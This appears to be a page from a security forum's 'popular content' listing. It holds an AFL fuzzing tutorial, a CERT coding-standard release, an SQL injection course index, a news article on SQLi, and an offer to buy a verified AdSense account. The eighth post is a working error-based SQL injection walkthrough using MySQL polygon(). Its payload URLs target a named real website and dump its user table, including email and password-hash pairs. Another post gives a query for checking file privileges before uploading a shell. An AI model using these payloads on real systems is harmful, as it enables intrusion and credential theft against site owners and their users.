
Leaderboard

Popular Content

Showing content with the highest reputation on 03/24/17 in all areas

  1. Fuzzing or fuzz testing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program. The program is then monitored for exceptions such as crashes, or failing built-in code assertions or for finding potential memory leaks.

     - While doing this tutorial I realized I also need the packages po4a, libtool, texi2html.

         sudo apt install po4a libtool texi2html

     I am using American Fuzzy Lop (afl). - http://lcamtuf.coredump.cx/afl/

         $ wget http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz
         $ tar xf afl-latest.tgz
         $ cd afl-2.39b/
         $ make
         $ sudo make install

     To see whether it installed successfully you can check by typing afl-gcc:

         $ afl-gcc
         afl-cc 2.39b by <lcamtuf@google.com>

         This is a helper application for afl-fuzz. It serves as a drop-in replacement
         for gcc or clang, letting you recompile third-party code with the required
         runtime instrumentation. A common use pattern would be one of the following:

           CC=/usr/local/bin/afl-gcc ./configure
           CXX=/usr/local/bin/afl-g++ ./configure

         You can specify custom next-stage toolchain via AFL_CC, AFL_CXX, and AFL_AS.
         Setting AFL_HARDEN enables hardening optimizations in the compiled code.

     Basically, this program expects the target under test to read files. Let's say we want to test the "wc" utility (a utility that counts lines in Linux).

         man wc
         .. scroll to the bottom with SHIFT-G ..
         [..]
         GNU coreutils 8.25

     Good, we found out that wc is part of the coreutils package. Let's grab the coreutils source and compile it. Since I'm using Ubuntu Server I look for it directly in the Canonical repos. I find it here:

         $ wget http://archive.ubuntu.com/ubuntu/pool/main/c/coreutils/coreutils_8.25.orig.tar.xz
         $ tar xf coreutils_8.25.orig.tar.xz
         $ cd coreutils-8.25/
         $ CC=afl-gcc ./configure
         $ make

     Good. Now we have compiled the utility we want to test with afl-gcc. Let's check that the fuzzer's symbols were really added.

         $ cd src/
         $ strings ./wc | grep -i afl
         [..]
         __afl_fork_pid
         .AFL_VARS
         __afl_global_area_ptr

     So everything is fine. Let's check that our program actually works.

         $ ./wc /etc/passwd
         33 48 1740 /etc/passwd

     The fuzzer needs two folders: one for input, the other for output.

         $ mkdir in/
         $ mkdir out/
         $ echo "test" > in/input
         $ echo "test2" >> in/input
         # testing
         $ ./wc in/input
         2 2 11 in/input

     Now let's start a run.

         $ afl-fuzz -i in/ -o out/ ./wc @@

         american fuzzy lop 2.39b (wc)

         process timing
           run time        : 0 days, 0 hrs, 0 min, 5 sec
           last new path   : 0 days, 0 hrs, 0 min, 2 sec
           last uniq crash : none seen yet
           last uniq hang  : none seen yet
         overall results
           cycles done  : 0
           total paths  : 58
           uniq crashes : 0
           uniq hangs   : 0
         cycle progress
           now processing  : 0 (0.00%)
           paths timed out : 0 (0.00%)
         map coverage
           map density    : 0.23% / 0.25%
           count coverage : 1.92 bits/tuple
         stage progress
           now trying  : havoc
           stage execs : 21.6k/32.8k (65.87%)
           total execs : 23.7k
           exec speed  : 3591/sec
         findings in depth
           favored paths : 1 (1.72%)
           new edges on  : 8 (13.79%)
           total crashes : 0 (0 unique)
           total hangs   : 0 (0 unique)
         fuzzing strategy yields
           bit flips   : 8/88, 1/87, 1/85
           byte flips  : 0/11, 1/10, 4/8
           arithmetics : 1/616, 0/75, 0/0
           known ints  : 0/62, 3/280, 3/352
           dictionary  : 0/0, 0/0, 0/0
           havoc       : 0/0, 0/0
           trim        : 0.00%/2, 0.00%
         path geometry
           levels    : 2
           pending   : 58
           pend fav  : 1
           own finds : 57
           imported  : n/a
           stability : 100.00%
         ^C
         [cpu000: 44%]

     You will find the inputs that crash the program in ./out/crashes and the ones that hang it in ./out/hangs. Have fun
    4 points
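Once a run has filled ./out/crashes, the next question is which of those files are distinct failures and which do not even reproduce outside the fuzzer. The script below is an added example, not part of the post above and not part of AFL; it assumes the layout the post describes (afl-fuzz stores crashing inputs as id:* files under out/crashes/, and the target is started with "@@" replaced by the input path, as in afl-fuzz -i in/ -o out/ ./wc @@). It re-runs the target on every crash file and groups the results by the signal that killed it or by exit code. The demo target, the crash file names and their contents are constructed for illustration; in real use you would pass ["./wc", "@@"] and "out/crashes".

```python
"""Re-run an AFL crash directory and group inputs by how the target died.

Added example, not part of the original post or of AFL. It assumes the
layout the post describes: afl-fuzz stores crashing inputs as id:* files
under <out>/crashes/, and the target is started with "@@" replaced by the
input file path (as in: afl-fuzz -i in/ -o out/ ./wc @@).
"""
import os
import signal
import subprocess
import sys
import tempfile
from collections import Counter


def run_one(target_cmd, input_path, timeout=5.0):
    """Run the target once on input_path.

    Returns ("signal", "SIGSEGV") if the child was killed by a signal,
    ("exit", code) for a normal exit, or ("timeout", None) for a hang.
    """
    cmd = [input_path if arg == "@@" else arg for arg in target_cmd]
    try:
        proc = subprocess.run(cmd, stdout=subprocess.DEVNULL,
                              stderr=subprocess.DEVNULL, timeout=timeout)
    except subprocess.TimeoutExpired:
        return ("timeout", None)
    if proc.returncode < 0:
        # POSIX: a negative return code is the number of the signal that
        # killed the child; map it to its name (SIGSEGV, SIGABRT, ...).
        return ("signal", signal.Signals(-proc.returncode).name)
    return ("exit", proc.returncode)


def triage(target_cmd, crash_dir, timeout=5.0):
    """Re-run every id:* file in crash_dir; return {filename: outcome}."""
    results = {}
    for name in sorted(os.listdir(crash_dir)):
        if not name.startswith("id:"):
            continue  # afl-fuzz also drops a README.txt into crashes/
        results[name] = run_one(target_cmd, os.path.join(crash_dir, name), timeout)
    return results


def summarize(results):
    """Count how many inputs produced each outcome."""
    return Counter(results.values())


# --- Constructed demo data (stands in for a real ./out/crashes and ./wc) ---

# A stand-in target run with the current Python interpreter: it reads the
# file named on its command line and fakes the two crash types AFL reports
# most often. It is NOT a real fuzz target and contains no real bug.
DEMO_TARGET_SRC = (
    "import os, signal, sys\n"
    "data = open(sys.argv[1], 'rb').read()\n"
    "if b'abort' in data:\n"
    "    os.abort()\n"
    "if b'boom' in data:\n"
    "    os.kill(os.getpid(), signal.SIGSEGV)\n"
    "sys.exit(0)\n"
)
DEMO_TARGET = [sys.executable, "-c", DEMO_TARGET_SRC, "@@"]

# File names imitate AFL's "id:NNNNNN,sig:SS,..." naming; contents are made up.
DEMO_CRASHES = {
    "id:000000,sig:11,src:000003,op:havoc,rep:4": b"boom",
    "id:000001,sig:06,src:000007,op:flip1,pos:2": b"abort",
    "id:000002,sig:11,src:000003,op:havoc,rep:8": b"does not reproduce",
    "README.txt": b"placeholder, skipped by triage()",
}


def make_demo_crash_dir():
    """Write the constructed crash files into a fresh temp dir; return its path."""
    path = tempfile.mkdtemp(prefix="afl-crashes-")
    for name, content in DEMO_CRASHES.items():
        with open(os.path.join(path, name), "wb") as fh:
            fh.write(content)
    return path


if __name__ == "__main__":
    # Real usage would be: triage(["./wc", "@@"], "out/crashes")
    crash_dir = make_demo_crash_dir()
    results = triage(DEMO_TARGET, crash_dir)
    for name, outcome in results.items():
        print(f"{name}: {outcome}")
    print("summary:", dict(summarize(results)))
```

The third constructed file is there on purpose: AFL names files by the signal it observed, but a crash that does not reproduce on a plain re-run (here it exits 0) is the first thing to separate out before spending time in a debugger. Grouping by signal name is only a first cut; for real triage you would next group by the faulting stack.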
  2. Buying an AdSense account, with verified PIN and preferably with some age. Waiting for PMs, offers, etc.
    1 point
  3. Pittsburgh, Pa., March 22, 2017—The Software Engineering Institute (SEI) has released the 2016 edition of the SEI CERT C++ Coding Standard. The standard provides rules for secure coding in the C++ programming language to help developers create safe, reliable, and secure systems free from undefined program behaviors and exploitable vulnerabilities.

     This C++ Coding Standard joins the SEI CERT C Coding Standard that was released in 2016. Both of these standards have been made available as free downloads in response to user demand, providing a wealth of expert knowledge and best practices for developing secure software systems in C and C++.

     The 2016 edition of the SEI CERT C++ Coding Standard reflects a decade of research and includes 83 new rules that take into account features of the C++ language that are not part of the C language. The majority of the SEI CERT C Coding Standard also provides guidance that is important for developing secure C++ programs, and they should both be used by C++ development programs.

     “This newly released C++ standard adds to our previously released C standard secure coding guidance for features that are unique to the C++ language. For example, this standard has guidance for object oriented programming and containers,” said Robert Schiela, technical manager, Secure Coding, for the SEI’s CERT Division. “It also contains guidance for features that were added to C++14, like lambda objects.”

     Mark Sherman, technical director, Cybersecurity Foundations, for the SEI’s CERT Division, added, “The SEI CERT C++ Coding Standard joins our other free guidelines for secure software development, making secure development best practices easily accessible to everyone. This new format can be widely shared for use in classes, tools, professional guides, internal development standards, acquisition and procurement specifications, and other environments.”

     To download the SEI CERT C++ Coding Standard, visit http://www.cert.org/secure-coding/products-services/secure-coding-cpp-download-2016.cfm.

     To download the SEI CERT C Coding Standard, visit http://www.cert.org/secure-coding/products-services/secure-coding-download.cfm.

     About the Software Engineering Institute

     The Software Engineering Institute (SEI) is a federally funded research and development center sponsored by the U.S. Department of Defense and operated by Carnegie Mellon University. The SEI works with organizations to make measurable improvements in their software engineering capabilities by providing technical leadership to advance the practice of software engineering. For more information, visit the SEI website at http://www.sei.cmu.edu. The CERT Division of the SEI is the world’s leading trusted authority dedicated to improving the security and resilience of computer systems and networks and a national asset in the field of cybersecurity. For more information, visit http://www.cert.org.

     Source. If you don't want to enter your details in order to download the file, here is the link.
    1 point
  4. I have an EliteBook 8460p and I'm very happy with it. I recommend it, especially since it also has a 14-inch screen. The one above has a 12-inch one, I think that's too small.
    1 point
  5. [Complete SQL Injection Course by Spirit]

     Hello guys, my name is Spirited wolf and here are all my tutorials on the most common types of SQL injection. You can say a complete course for every noob. Here we go. For testing purposes we need to set up some SQLi labs to test how things really work.

     - Setup pentesting labs in Kali Linux - Tutorial 1
     - Addons for Firefox that we need by Spirit - Tutorial 2
     - Basics of SQL injection, from finding columns to dumping the database - Part 1 - Tutorial 3
     - Explanation for dumping tables and columns - Part 2 - Tutorial 3
     - Error Based String With Twist by Spirit - Tutorial 4
     - How to use SqlMap for injecting a site by Spirit - Tutorial 5
     - How to set up pentesting labs and SqlMap on Windows OS by Spirit - Tutorial 6
     - Double Quote Based injection tutorial by Spirit - Tutorial 7
     - Blind Based Injection: basic commands that you should know by Spirit - Tutorial 8 (Part 1)
     - Blind Based SQL injection tutorial by Spirit - Tutorial 9 (Part 2)
     - How to dump a database with Blind SQL injection (Manual + SqlMap) method by Spirit - Tutorial 9 (Part 3)
     - Introduction to Post Based SQL Injection by Spirit - Tutorial 10
     - Post Based: Double Quote Injection (Tricky) by Spirit - Tutorial 11
     - Important commands for {Post and Get} based Double Query Injection by Spirit - Tutorial 12
     - [GET] How to inject a site if commas are blocked by Spirit - Tutorial 13
     - Cookie Based SQL Injection full explanation by Spirit - Tutorial 14
     - How to make a simple DIOS by Spirit - Tutorial 15
     - Base64 String Based Injection by Spirit - Tutorial 16
     - Inject a web application when [OR && AND] are filtered by the web developers by Spirit - Tutorial 17
     - Second order injection explanation by Spirit - Tutorial 18
     - Inject web applications when blank spaces are blacklisted by the developer by Spirit - Tutorial 19
     - Uploading a shell with an SQLi command by Spirit

     /* For shelling via SQLi query you first have to check if root priv. is On/Off; if On then you can upload it. Just type this in the vulnerable column to check.. { (SELECT+GROUP_CONCAT(user,0x202d3e20,file_priv,0x3c62723e)+FROM+mysql.user) } */

     And please! Please subscribe to my channel and please share if you like. So, I hope you like all these amazing tutorials of mine; if you like them then please like my tutorial, subscribe, comment and let me know my mistakes if you found any. Please comment if I did anything wrong.

     ------------------------------------------------------------------------------------------------------------
     This tutorial is for educational purposes only. I'll not be responsible for any harm.
     ------------------------------------------------------------------------------------------------------------

     Use your skills to protect others, not to harm. Thanks for watching guys and keep watching Pentesting with Spirit.

     Our YouTube channel link:: https://www.youtube.com/c/Pentestingwithspirit
     Facebook page link:: http://facebook.com/Pentest.with.spirit1
     Twitter account:: @spirit3113
    1 point
  6. WRITTEN BY JOSEPH COX November 20, 2015 // 08:00 AM EST

     One of the hackers suspected of being behind the TalkTalk breach, which led to the personal details of at least 150,000 people being stolen, used a vulnerability discovered two years before he was even born.

     That method of attack was SQL injection (SQLi), where hackers typically enter malicious commands into forms on a website to make it churn out juicy bits of data. It's been used to steal the personal details of World Health Organization employees, grab data from the Wall Street Journal, and hit the sites of US federal agencies.

     “It’s the most easy way to hack,” the pseudonymous hacker w0rm, who was responsible for the Wall Street Journal hack, told Motherboard. The attack took only a “few hours.”

     But, for all its simplicity, as well as its effectiveness at siphoning the digital innards of corporations and governments alike, SQLi is relatively easy to defend against. So why, in 2015, is SQLi still leading to some of the biggest breaches around?

     SQLi was possibly first documented by Jeff Forristal in the hacker zine Phrack. Back then, Forristal went by the handle rain.forest.puppy, but he's now CTO of mobile security at cybersecurity vendor Bluebox security.

     “According to Microsoft, what you're about to read is not a problem, so don't worry about doing anything to stop it.”

     SQL, or Structured Query Language, is a programming language used to manage databases. In essence, it's used when a website needs to call up a piece of information from its database, either to process it or present it to a user. But Forristal had found that typing certain commands would force a server to reveal information stored on it. “People can possibly piggyback SQL commands,” he wrote.

     In the December 1998 issue of Phrack, Forristal wrote about a series of issues with a version of Microsoft SQL server. When Forristal's fellow researcher told Microsoft of the problems, “their answer was, well, hilarious,” he wrote. “According to them, what you're about to read is not a problem, so don't worry about doing anything to stop it.”

     Today, over 15 years after it was first publicly disclosed, SQLi repeatedly sits at the number one spot of vulnerabilities in the OWASP Top 10 report, which is released every three years by the Open Web Application Security Project (OWASP) Foundation, a non-profit that monitors the threats that websites face.

     Phrack's current logo. Image: Phrack

     “SQL injection is always the number one risk. That is a reflection of just how many incidents are out there, as well as other factors that keep it very high up there,” Troy Hunt, founder of breach site haveibeenpwned.com, told Motherboard in a phone interview.

     “When you go to a webpage, and you make a request, that parses part of the data in the request back to a server,” Hunt said. “For example, you read a news article, and the news article, in the address bar it has, “id=1”, and that gives you news article number 1, and then you get another one with ID 2.”

     But, “with a SQLi attack, an attacker changes that ID in the address bar to something that forces the database to do something it's not meant to do,” Hunt said, such as returning a piece of private data.

     An individual attack might just return one piece or section of info, so an attacker is likely to “repeat it over and over and over again, as many times as is necessary, so they get every piece of data from the database,” Hunt said.

     Naturally, that's going to be quite time consuming. So, a hacker might use tools that automate the process instead. Those include Havij, which “is popular amongst script kiddies as it's for Windows and has a [graphical user interface],” Mustafa Al-Bassam, a security researcher and former LulzSec hacker, told Motherboard in an online chat. Another commonly used piece of software is sqlmap.

     “It crawls the pages on the website, similar to how a search engine crawler might, looks for input forms on the website, and submits the forms with inputs that might cause a MySQL syntax error,” Al-Bassam added.

     When the attacker is looking for a target to hit in the first place, that's just as simple to automate too.

     Image: sqlmap

     “They would use Google to search for URLs that are known to be typically associated with scripts that are vulnerable to SQL injection,” Al-Bassam said. “They would typically have a script that goes through all the URLs and tests them automatically to see if they're vulnerable.”

     “You could teach a 4-year-old to do it,” Al-Bassam added, summing up how incredibly easy the whole process is. Indeed, Hunt has uploaded a video of him teaching his 3-year-old son how to carry out an SQLi attack with Havij. “You put the URL in, here's all the data out,” Hunt told Motherboard. There are also ample on how to carry out an SQLi attack.

     The thing is, there are solutions ready to be deployed by website developers to stop SQLi attacks and the unnecessary leaking of customers' data or corporate details. And those solutions have been around for years. One of those is the adoption of "prepared statements": when SQL commands controlling the database can’t be directly dictated by a user’s input.

     If the solutions are fairly straightforward, why are SQLi-based attacks still happening?

     “The benefit of prepared statements is that they set the semantics of a query so that any incoming data can’t surprise the developer by including syntax that changes a query intended to retrieve a single row into a query that extracts data from arbitrary tables,” Mike Shema, senior manager, software development engineer from Yahoo!, told Motherboard in an email.

     Another is to “use SQL libraries that take care of input sanitization for them,” Al-Bassam suggested. This, in short, scrubs any data entered by the user to remove any potential malicious parts of it.

     So, if SQLi is so easy that literally a child could do it, and the solutions are fairly straightforward, why are SQLi-based attacks still happening?

     “Any serious programmer should know about SQLi, but there's a massive shortage of programmers, so companies hire anyone even if they don't have the right training or experience to mitigate basic vulnerabilities,” Al-Bassam suggested. On top of this, “they're often put under pressure by their managers to develop functional software rather than secure software.”

     Shema from Yahoo! echoed this, and said that “Sometimes small apps with a narrow feature set just need to be written quickly,” meaning that the developers might bypass some of the mitigations for each attack, despite them being relatively straightforward to implement.

     Hunt was slightly less forgiving, and didn't agree that it was because of pressure from higher management. Instead, he lamented the large number of tutorials available to web developers online that, instead of providing decent advice, detail how to make systems that are vulnerable to SQLi. "I've seen multiple tutorials come up this year that have got blatant SQL injection risks in them,” he said.

     So just as script kiddies continue to share their SQLi on YouTube, there is parallel information sharing going on with website developers. “We've got this ability for anyone to stand up, and share their knowledge, and not always get it right,” Hunt said.

     Ultimately, the responsibility for the security of these sites, and the data they contain, boils down to web developers themselves. That means SQLi and the breaches it causes will remain, at least for a little while longer.

     Source: http://motherboard.vice.com/read/the-history-of-sql-injection-the-hack-that-will-never-go-away
    1 point
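The "id=1" lookup Hunt describes and the prepared-statement fix Shema explains can be put side by side in a few lines. The following Python/sqlite3 script is an added example, not from the Motherboard article, the people quoted in it, or the poster above; the news table and its three rows are constructed so it runs offline. It implements the same lookup twice, once with the request value spliced into the query text and once with the value bound as a parameter, plus the validating wrapper a request handler should actually call.

```python
"""The article-by-id lookup from the text, vulnerable and parameterized.

Added example, not part of the Motherboard article or the original post.
Uses SQLite so it runs offline; the table and its rows are constructed.
"""
import sqlite3

# Constructed sample data: an "id=1 / id=2" news table as in Hunt's example.
# Row 3 is a draft the public page must never return.
ARTICLES = [
    (1, "Public article one", 0),
    (2, "Public article two", 0),
    (3, "Unpublished draft", 1),
]


def make_db():
    """Create an in-memory database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, draft INTEGER)"
    )
    conn.executemany("INSERT INTO news VALUES (?, ?, ?)", ARTICLES)
    return conn


def get_article_concat(conn, raw_id):
    """VULNERABLE: the request value becomes part of the SQL text.

    Whatever syntax the value contains is parsed as SQL, so the
    'draft = 0' guard can be switched off from the address bar.
    """
    sql = "SELECT id, title FROM news WHERE draft = 0 AND id = " + raw_id + " ORDER BY id"
    return conn.execute(sql).fetchall()


def get_article_prepared(conn, raw_id):
    """FIXED: the query shape is fixed; the value is bound as data.

    The driver never parses the bound value as SQL, so a tampered
    value can at most fail to match a row.
    """
    sql = "SELECT id, title FROM news WHERE draft = 0 AND id = ? ORDER BY id"
    return conn.execute(sql, (raw_id,)).fetchall()


def lookup(conn, raw_id):
    """What the request handler should do: validate the type, then bind.

    Returns the matching rows, or None when the value is not an integer
    at all (a good signal to log as a suspicious request).
    """
    try:
        article_id = int(raw_id)
    except (TypeError, ValueError):
        return None
    return get_article_prepared(conn, article_id)


if __name__ == "__main__":
    db = make_db()
    # A normal request and a tampered one, through each code path.
    print("normal, concat:  ", get_article_concat(db, "1"))
    print("tampered, concat:", get_article_concat(db, "1 OR 1=1"))  # leaks the draft
    print("tampered, bound: ", get_article_prepared(db, "1 OR 1=1"))
    print("tampered, lookup:", lookup(db, "1 OR 1=1"))
```

The parameterized version alone already stops the query from changing shape; the extra int() check in lookup() is what turns a silently empty result into something an application can log and alert on, which is the detection side of the same problem.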
  7. ###### Info ######

     Title : Beyond SQLi: Obfuscate and Bypass
     Author : "ZeQ3uL" (Prathan Phongthiproek) and "Suphot Boonchamnan"
     Team : CWH Underground [http://www.exploit-db.com/author/?a=1275]
     Date : 2011-10-06

     ########## Contents ##########

     [0x00] - Introduction
     [0x01] - Filter Evasion (Mysql)
       [0x01a] - Bypass Functions and Keywords Filtering
       [0x01b] - Bypass Regular Expression Filtering
     [0x02] - Normally Bypassing Techniques
     [0x03] - Advanced Bypassing Techniques
       [0x03a] - HTTP Parameter Pollution: Split and Join
       [0x03b] - HTTP Parameter Contamination
     [0x04] - How to protect your website
     [0x05] - Conclusion
     [0x06] - References
     [0x07] - Greetz To

     #Link: https://www.exploit-db.com/papers/17934/

     @Nytro, there's a bug in the tags field: it auto-fills with more than 5 tags and then doesn't let you post or preview. It's annoying if you want to format an article/tutorial.
    1 point
  8. This method is based on the function polygon(). In a nutshell, this function constructs a geometry collection. The vuln thing about it is that it can only work with the function point(). For example:

         SELECT polygon(point(53,12));

     And the output is a bunch of ???'s. Not really exciting, ah? For those who know a bit of geometry, it goes like point(x,y). Now look what happens when we don't use point().

         SELECT polygon(53,12);
         Error 1367 (22007): Illegal non geometric '53' value found during parsing

     We get an error on our x argument, 53. So let's think a bit. If the error returns our string input as a string output, what would happen if we try to run a query?

         SELECT polygon((select*from(select*from(select@@version)f)x));
         Error 1367 (22007): Illegal non geometric '(select `x`.`@@version` from (select '5.5.38-35.2' AS `@@version` from dual) `x`)' value found during parsing

     Boom! 5.5.38-35.2

     Now let's try that on a real site. Conditions: mysql_error on. Let's get the version:

         http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select@@version)f)x))
         5.1.73-log

     Nice, but can we extract more? Hell yeah. We will be using this to get tables:

         http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(table_name) from information_schema.tables where table_schema=database())f)x))
         blocklist,log_login,pernodmajorwinners,pernodmanagement,pernodmatches,pernodmessages,pernodnews,pernodpolls,pernodtopics,pernoduser

     I'm interested in the table pernoduser, let's get columns:

         http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(column_name) from information_schema.columns where table_name='pernoduser' )f)x))
         pernodid,nickname,fullname,forumname,password,email,handicap,p_dbl,p_sgl,login,forumnotify,deleted

     And dump the table:

         http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(email,0x3a,password) from pernoduser)f)x))
         [dumped e-mail:password-hash pairs redacted]

     And we get the data. To overpower the 'cut results', we can just add a condition at the end, " where email>last-email ". Hope you learned something!

     Source: HF + Frostyhacks
    1 point
  9. Lab tests carried out by Dutch scientists have shown that some of today's "smart" electrical meters may give out false readings that in some cases can be 582% higher than actual energy consumption.

     The study involved several tests conducted on nine different brands of "smart" meters, also referred to in the industry as "static energy meters." Researchers also used one electromechanical meter for reference.

     Using a simple test rig, portrayed above, researchers connected the smart meters to various power-consuming appliances found in regular homes, such as energy saving light bulbs, heaters, LED bulbs, and dimmers.

     Tests lasted for six months

     Experiments went on for six months, with individual tests lasting at least one week, and sometimes several weeks. Researchers tried to reproduce regular household energy consumption patterns and didn't focus on putting the smart meters under stressful conditions.

     The study was conducted by researchers from the University of Twente and the Amsterdam University of Applied Sciences. As such, the meters were chosen to represent the installed base of energy meters in the Netherlands. Meters used in the tests were manufactured between 2004 and 2014.

     Test results varied wildly, with some meters reporting errors way above their disclosed range, going from -32% to +582%. Tests with uncommon results were repeated several times and the results were within a few percent of the original.

     Test results matched user complaints

     The results of their study matched numbers posted on an online forum by a disgruntled Dutchman complaining about high energy bills.

     Overall, five of the nine smart meters gave out readings much higher than the actual amount of power consumed, while two gave lower readings. The greatest inaccuracies were seen when researchers combined dimmers with energy saving light bulbs and LED bulbs.

     After finishing their lab experiment, researchers dismantled the smart meters to understand the problem. Following their efforts, the three-man research team discovered that smart meters which gave abnormally high readings used a Rogowski Coil in their setup, while the smart meters that gave out low readings used Hall effect-based sensors.

     Problems blamed on smart meter designs

     Researchers blamed all the issues on the design of some smart meters, and, ironically, electrical devices with energy-saving features. The latter devices, researchers say, introduced a large amount of noise in electrical current waveforms, which disrupts the smart meter sensors tasked with recording power consumption.

     "The reason for faulty readings appears to be the current sensor, and the associated circuitry," said researchers. "The experimental results [...] show that static energy meters can be pushed into faulty reading (positive and negative) if sufficiently fast pulsed currents are drawn by the consumer."

     Up to 750,000 faulty smart meters in the Netherlands alone

     Since the research only covered smart meters commonly installed in Dutch homes, researchers say that around 750,000 smart meters deployed around the Netherlands may be giving out false readings. Worldwide, the number of possibly faulty smart meters could be in the millions, especially after some governments, especially in the EU, have pushed for smart meters to replace classic electromechanical (rotating disk) meters.

     The true impact cannot be assessed, as researchers did not publish the names, makes, and models of the tested smart meters. The research team's work, titled "Static Energy Meter Errors Caused by Conducted Electromagnetic Interference," has been published in the IEEE Electromagnetic Compatibility Magazine.

     Source: https://www.bleepingcomputer.com/news/hardware/millions-of-smart-meters-may-over-inflate-readings-by-up-to-600-percent/
    -1 points
  10. Fixed Software

      The vendor has released updated software at the following link: jQuery UI v1.12.1

      Update the UI and drop the nonsense.
    -1 points